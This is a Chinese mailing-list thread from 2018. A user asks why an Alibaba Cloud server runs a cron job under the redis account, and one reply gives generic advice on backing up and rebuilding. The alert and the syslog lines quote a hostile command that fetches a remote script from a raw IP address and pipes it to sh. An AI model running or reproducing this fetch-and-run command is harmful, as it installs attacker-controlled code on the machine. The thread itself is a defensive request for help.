我的服务器是否成了肉鸡

[Hao Weibo]

我的阿里云服务器报警：

• 进程名称： null
• 
  
• 进程路径： /bin/dash
• 
  
• 进程id： 20950
• 
  
• 命令行参数： /bin/sh -c wget -q http://185.198.57.167/img/Circle_AA.png -O - |sh

• 事件说明： 黑客通过应用系统原生下载指令从远程服务器下载恶意文件，危害服务器安全。如果该指令不是您自己运行，请及时排查入侵原因
• 解决方案： 建议立即及时加固系统密码，并排查异常指令

通过ps -aux查找pid为20950的进程，但是没有找到。接着查询了系统日志

$ cat /var/log/syslog

1 Mar 29 20:45:01 AY140430141633336379Z CRON[21596]: (redis) CMD (wget -q http://185.198.57.167/img/Circle_AA.png -O - |sh)

2 Mar 29 20:45:01 AY140430141633336379Z CRON[21597]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)

一开始我怀疑是因为redis没设置密码的原因，但重新设置后，报警依然没有解除，系统日志里也继续出现那个关于redis wget的东西。

请问出现这些问题原因怎么排查呢，如何阻止它继续下去

[Zoom.Quiet]

2018-03-29 21:00 GMT+08:00 Hao Weibo <haowei...@gmail.com>:
> 我的阿里云服务器报警：
>
> 进程名称： null
>
> 进程路径： /bin/dash
>
> 进程id： 20950
>
> 命令行参数： /bin/sh -c wget -q http://185.198.57.167/img/Circle_AA.png -O - |sh
>
>
>
>
>
> 事件说明： 黑客通过应用系统原生下载指令从远程服务器下载恶意文件，危害服务器安全。如果该指令不是您自己运行，请及时排查入侵原因
> 解决方案： 建议立即及时加固系统密码，并排查异常指令
>

既然是 aliyun, 一般的解决思路:

0: 搜索是否有类似问题的处置方法
1: 加入官方 dindin 群咨询值班工程师
2: 备份自己的关键数据/配置到本地, 如果有镜像的话, 回滚到之前安全状态, 再增补那之后的配置
3: 备份后, 关闭并删除这个有问题的 ECS 实例, 重新申请, 部署
4: ...


方法总是比问题多的

>
>
>
> 通过ps -aux查找pid为20950的进程，但是没有找到。接着查询了系统日志
>
> $ cat /var/log/syslog
> 1 Mar 29 20:45:01 AY140430141633336379Z CRON[21596]: (redis) CMD (wget -q
> http://185.198.57.167/img/Circle_AA.png -O - |sh)
> 2 Mar 29 20:45:01 AY140430141633336379Z CRON[21597]: (root) CMD (command -v
> debian-sa1 > /dev/null && debian-sa1 1 1)
>
> 一开始我怀疑是因为redis没设置密码的原因，但重新设置后，报警依然没有解除，系统日志里也继续出现那个关于redis wget的东西。
> 请问出现这些问题原因怎么排查呢，如何阻止它继续下去
>

> --


--
life is pathetic, go Pythonic! 人生苦短, Python当歌!
俺: http://zoomquiet.io
授: http://creativecommons.org/licenses/by-sa/2.5/cn/
怒: 冗余不做,日子甭过!备份不做,十恶不赦!
KM keep growing environment culture which promoting organization learning!